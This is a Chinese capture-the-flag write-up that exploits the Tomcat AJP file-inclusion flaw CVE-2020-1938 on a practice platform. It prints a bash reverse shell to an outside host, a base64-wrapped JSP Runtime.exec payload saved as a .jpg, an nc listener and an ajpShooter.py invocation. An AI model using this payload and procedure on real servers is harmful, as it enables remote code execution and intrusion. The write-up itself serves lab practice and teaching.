安鸾渗透实战平台(中间件) Apache Tomcat AJP 文件包含漏洞(CVE-2020-1938 ) (150分)

漏洞环境

安鸾渗透实战平台
公网vps
CVE-2020-1938文件包含exp
base64加密网站

题目:


安鸾渗透实战平台(中间件) Apache Tomcat AJP 文件包含漏洞(CVE-2020-1938 ) (150分)_第1张图片

解法:

1、访问对应网页

网页上可以发现一个明显的上传点,而题目是文件包含漏洞,所以可以编写一个代码代码文件上传,然后使用文件包含就行。由于文件包含不限制后缀,这里直接上传.jsp后缀即可
安鸾渗透实战平台(中间件) Apache Tomcat AJP 文件包含漏洞(CVE-2020-1938 ) (150分)_第2张图片

2、制作一个反弹shell文件

写一个反弹shell然后拿去base64加密

bash -i >& /dev/tcp/1.1.1.1/666  0>&1

安鸾渗透实战平台(中间件) Apache Tomcat AJP 文件包含漏洞(CVE-2020-1938 ) (150分)_第3张图片
将加密后的内容做拼接,方便java解析

<%Runtime.getRuntime().exec("bash -c {echo,bash64加密后的内容}|{base64,-d}|{bash,-i}");%>

保存为jpg
安鸾渗透实战平台(中间件) Apache Tomcat AJP 文件包含漏洞(CVE-2020-1938 ) (150分)_第4张图片

3、来到上传点进行上传

安鸾渗透实战平台(中间件) Apache Tomcat AJP 文件包含漏洞(CVE-2020-1938 ) (150分)_第5张图片
上传后系统会把你的文件重命名,为了防止搞混,可以先点击查看所有图片去蹲点
安鸾渗透实战平台(中间件) Apache Tomcat AJP 文件包含漏洞(CVE-2020-1938 ) (150分)_第6张图片
文件上传成功,点击查看图片
安鸾渗透实战平台(中间件) Apache Tomcat AJP 文件包含漏洞(CVE-2020-1938 ) (150分)_第7张图片
找到你上传的图片
安鸾渗透实战平台(中间件) Apache Tomcat AJP 文件包含漏洞(CVE-2020-1938 ) (150分)_第8张图片鼠标右键点击复制图片连接
安鸾渗透实战平台(中间件) Apache Tomcat AJP 文件包含漏洞(CVE-2020-1938 ) (150分)_第9张图片

5、起一台公网vps使用nc监听反弹shell的端口

nc -lnp 666
在这里插入图片描述

6、使用脚本进行文件包含

python ajpShooter.py http://106.15.50.112:18080/whalwl 18009 /upload/2023-000002-000008.jpg eval
  • http://106.15.50.112:18080/whalwl:页面位置
  • 18009 :ajp端口号
  • /upload/2023-000002-000008.jpg :上传反弹shell图片的位置
  • eval :执行

当回显200状态码时,证明成功包含并执行文件
安鸾渗透实战平台(中间件) Apache Tomcat AJP 文件包含漏洞(CVE-2020-1938 ) (150分)_第10张图片

7、来到vps上检查效果

使用 find / -name flag 来查找flag

安鸾渗透实战平台(中间件) Apache Tomcat AJP 文件包含漏洞(CVE-2020-1938 ) (150分)_第11张图片
可以看到在根目录上,直接看

cat /flag

在这里插入图片描述
安鸾渗透实战平台(中间件) Apache Tomcat AJP 文件包含漏洞(CVE-2020-1938 ) (150分)_第12张图片

漏洞描述

  该漏洞使攻击者可以读取任何webapps文件(例如webapp配置文件,源代码等)或包括一个文件来远程执行代码。由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。

影响版本

Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31

你可能感兴趣的:(安鸾渗透实战平台,中间件,apache,tomcat)